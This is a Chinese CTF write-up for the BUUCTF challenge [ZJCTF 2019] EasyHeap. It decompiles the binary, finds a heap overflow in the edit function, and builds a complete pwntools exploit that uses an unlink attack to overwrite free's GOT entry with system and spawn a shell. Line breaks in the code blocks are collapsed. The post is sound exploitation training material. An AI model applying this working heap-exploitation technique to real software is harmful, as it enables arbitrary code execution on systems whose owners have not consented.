当前位置：首页 > article >正文

BUUCTF [ZJCTF 2019]EasyHeap

article 2025/6/1 21:32:47

前置知识点:

unlink知识点和手法-CSDN博客

[ZJCTF 2019]EasyHeap

1.准备

2.ida分析

main函数

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{int n3; // eaxchar buf[8]; // [rsp+0h] [rbp-10h] BYREFunsigned __int64 v5; // [rsp+8h] [rbp-8h]v5 = __readfsqword(0x28u);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stdin, 0LL, 2, 0LL);while ( 1 ){while ( 1 ){menu();read(0, buf, 8uLL);n3 = atoi(buf);if ( n3 != 3 )break;delete_heap();}if ( n3 > 3 ){if ( n3 == 4 )exit(0);if ( n3 == 4869 ){if ( (unsigned __int64)magic <= 0x1305 ){puts("So sad !");}else{puts("Congrt !");l33t();}}else{
LABEL_17:puts("Invalid Choice");}}else if ( n3 == 1 ){create_heap();}else{if ( n3 != 2 )goto LABEL_17;edit_heap();}}
}

就有一个堆题正常的菜单，有增删改功能，依次查看

1-create_heap函数

unsigned __int64 create_heap()
{int i; // [rsp+4h] [rbp-1Ch]size_t size; // [rsp+8h] [rbp-18h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v4; // [rsp+18h] [rbp-8h]v4 = __readfsqword(0x28u);for ( i = 0; i <= 9; ++i ){if ( !*(&heaparray + i) ){printf("Size of Heap : ");read(0, buf, 8uLL);size = atoi(buf);*(&heaparray + i) = malloc(size);if ( !*(&heaparray + i) ){puts("Allocate Error");exit(2);}printf("Content of heap:");read_input(*(&heaparray + i), size);puts("SuccessFul");return __readfsqword(0x28u) ^ v4;}}return __readfsqword(0x28u) ^ v4;
}

这里是添加堆块，限制了创建堆块的个数和大小

3-delete_heap函数

unsigned __int64 delete_heap()
{int n0xA; // [rsp+Ch] [rbp-14h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v3; // [rsp+18h] [rbp-8h]v3 = __readfsqword(0x28u);printf("Index :");read(0, buf, 4uLL);n0xA = atoi(buf);if ( (unsigned int)n0xA >= 0xA ){puts("Out of bound!");_exit(0);}if ( *(&heaparray + n0xA) ){free(*(&heaparray + n0xA));*(&heaparray + n0xA) = 0LL;puts("Done !");}else{puts("No such heap !");}return __readfsqword(0x28u) ^ v3;
}

没存在UAF漏洞

2-edit函数

unsigned __int64 edit_heap()
{int n0xA; // [rsp+4h] [rbp-1Ch]__int64 size; // [rsp+8h] [rbp-18h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v4; // [rsp+18h] [rbp-8h]v4 = __readfsqword(0x28u);printf("Index :");read(0, buf, 4uLL);n0xA = atoi(buf);if ( (unsigned int)n0xA >= 0xA ){puts("Out of bound!");_exit(0);}if ( *(&heaparray + n0xA) ){printf("Size of Heap : ");read(0, buf, 8uLL);size = atoi(buf);printf("Content of heap : ");read_input(*(&heaparray + n0xA), size);puts("Done !");}else{puts("No such heap !");}return __readfsqword(0x28u) ^ v4;
}

这里修改堆块数据，但没有限制用户输入内容的大小，当修改堆块大小大于原本堆块大小，并且修改内容大于原本大小时，会造成堆溢出。

4869-l33t函数(后门函数)

发现在选择4869的时候，会对magic的数据进行大小判断，当其不小于等于0x1305的时候，有一个l33t函数

int l33t()
{return system("cat /home/pwn/flag");
}

这里是一个连接点

3.EXP

思路:

这题有堆溢出和连接点，一开始想着去改magic，触发连接点，但能力不太行，正好这题可以用unlink，就当做学习unlink的一道例题
因为不用连接点，但可以用system函数，所以我们可以想办法写入'/bin/sh'
1.构造一个fake_chunk(伪造堆块)，触发unlink
2.通过覆盖free_got地址为system地址，将free函数的调用重定向到system函数
3.最后通过添加删除带有'/bin/sh'内容的堆块，获得flag
先创建三个堆块，前两个chunk0和chunk1用于unlink，第三个chunk2写入内容'/bin/sh'，用于最后释放，触发连接

from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(size,content):io.sendlineafter("Your choice :", "1")io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap:", content)def delete(index):io.sendlineafter("Your choice :", "3")io.sendlineafter("Index :", str(index))def edit(index,size, content):io.sendlineafter("Your choice :", "2")io.sendlineafter("Index :", str(index))io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap :", content)add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

然后构造一个fake_chunk(伪造堆块)，这里的目标地址是heaparray的0x6020E0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

把构造的fake_chunk写入chunk0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)

在释放1块，触发unlink

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)

我们加上偏移，然后把free_got的地址写入

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

这里写入的是heaparray[0]，对应了chunk0

接着覆盖free_got地址为system地址，将free函数的调用重定向到system函数

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))

最后释放带有'/bin/sh'内容2块，形成system('/bin/sh')，触发连接

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))delete(2)

脚本

from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(size,content):io.sendlineafter("Your choice :", "1")io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap:", content)def delete(index):io.sendlineafter("Your choice :", "3")io.sendlineafter("Index :", str(index))def edit(index,size, content):io.sendlineafter("Your choice :", "2")io.sendlineafter("Index :", str(index))io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap :", content)add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))delete(2)io.interactive()